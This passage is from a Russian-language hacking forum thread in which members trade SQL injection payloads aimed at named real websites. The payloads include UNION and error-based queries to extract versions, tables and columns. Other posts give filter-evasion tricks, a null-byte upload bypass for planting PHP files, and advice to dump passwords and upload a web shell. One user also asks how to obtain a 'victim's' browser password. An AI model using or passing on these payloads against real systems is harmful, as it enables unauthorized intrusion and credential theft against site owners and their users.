Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    Помогите определить движек http://www.peterjob.ru/
    http://www.peterjob.ru/vakancy_search/2/?job_category=5-5%20union%20select%201--
     
  2. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    самопис
     
  3. Darren

    Darren Banned

    Joined:
    14 Jun 2008
    Messages:
    34
    Likes Received:
    5
    Reputations:
    6
    delete
     
    #11603 Darren, 1 Mar 2010
    Last edited: 4 Mar 2010
  4. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    там 4-ая ветка, name_const не поможет
     
  5. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    права 777, но файл не writable - почему так?

    linux SuSE + apache2 + php 4.3.3
     
  6. hackmen

    hackmen Banned

    Joined:
    22 Oct 2007
    Messages:
    110
    Likes Received:
    46
    Reputations:
    1
    Помогите вывести версию Плиз

    http://www.nzgeographic.co.nz/articles.php?ID=75+union+select+1,2,3,4,5,6,7--
     
  7. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    http://www.nzgeographic.co.nz/articles.php?ID=(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+1)a)--+
    
     
    3 people like this.
  8. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    http://wiki.linuxformat.ru/index.php/LXF90:Apache, для хека даст развечто логины пользователей для последующего брутфорса.
     
    1 person likes this.
  9. 2Fed123

    2Fed123 Banned

    Joined:
    26 Feb 2009
    Messages:
    56
    Likes Received:
    5
    Reputations:
    0
    При MSSQL inj WAF удаляет select,какой есть аналог или как обойти?Спасибо
     
  10. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    /*!select*/
     
  11. 2Fed123

    2Fed123 Banned

    Joined:
    26 Feb 2009
    Messages:
    56
    Likes Received:
    5
    Reputations:
    0
    or+1=(/*!select*/+table_name+from+information_schema.tables)--
    ругается Line 1: Incorrect syntax near '/'.
     
  12. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Если там банальный str_replace, попробуй с регистром поиграть, т.е (к примеру)
    Code:
    sElEcT
    А если же str_ireplace, тогда так:
    Code:
    seselectlect
    Но не факт что сработает, т.к. все вышесказанное основано лишь на догадках.
     
    1 person likes this.
  13. Pikachu

    Pikachu New Member

    Joined:
    3 Nov 2006
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Подскажите как мне узнать пароль от сайта в опере, если "жертва" не запоминает пароль и ставит галочку чужой компьютер?
     
  14. Sharsky

    Sharsky New Member

    Joined:
    3 Mar 2010
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Не могу до конца раскрутить скул:

    Code:
    http://www.sixls.com/news.php?id=-3+union+select+1,concat_ws(0x0b, version(), database(), user()),3--
    Версия: 5.0.88-community-log
    Юзер: sixls_com_-_1
    База: [email protected]

    Идут таблицы:

    Code:
    http://www.sixls.com/news.php?id=-3+union+select+1,table_name,3+from+information_schema.tables--
    Дальше поля:

    Code:
    http://www.sixls.com/news.php?id=-3+union+select+1,column_name,3+from+information_schema.columns--
    -----------------------------------------
    Я искал на форуме и ни как не мог найти инфу о том как выводить поля, которые находятся в определенной таблице, и как из полей выводить нужные данные, например пароль и и мя пользователя. Заранее спасибо =)
     
  15. v1d0qz

    v1d0qz Elder - Старейшина

    Joined:
    21 Jul 2007
    Messages:
    67
    Likes Received:
    90
    Reputations:
    52
    Для начала...
    http://forum.antichat.ru/thread104591.html
     
  16. j0ker13

    j0ker13 Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    199
    Likes Received:
    16
    Reputations:
    5
    как обойти такую конструкцию?)
    на $row['ID'] могу влиять)
    сделал $row['ID'] = "1.php%00" получил:
    Warning: move_uploaded_file(../photos/1.php%00.photo1.jpg) [function.move-uploaded-file]: failed to open stream: Permission denied in /usr/www/users/manager/updateProfile.php on line 814
    создать фаил прав не хватает или что то другое?
     
  17. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    Да, не хватает. А обычные гифки тоже не грузятся?
     
  18. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    мож кто попробует вывести или еще что ?
     
  19. AtomoS

    AtomoS New Member

    Joined:
    17 Feb 2010
    Messages:
    88
    Likes Received:
    1
    Reputations:
    0
    начал ломать свой первый сайт) обнаружил пути, даже файл с подключением к БД (конфиги) а что дальше?(
     
  20. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,182
    Likes Received:
    618
    Reputations:
    690
    подключится к БД и сдампить/вытащить пароли и попробовать к админке сайта или через mysql залить шелл и юзать полноценный шелл ....
    P.S Зачем ломал то если не знаеш что делать дальше ? ))
     
    _________________________
    #11620 shell_c0de, 4 Mar 2010
    Last edited: 4 Mar 2010
    1 person likes this.
Thread Status:
Not open for further replies.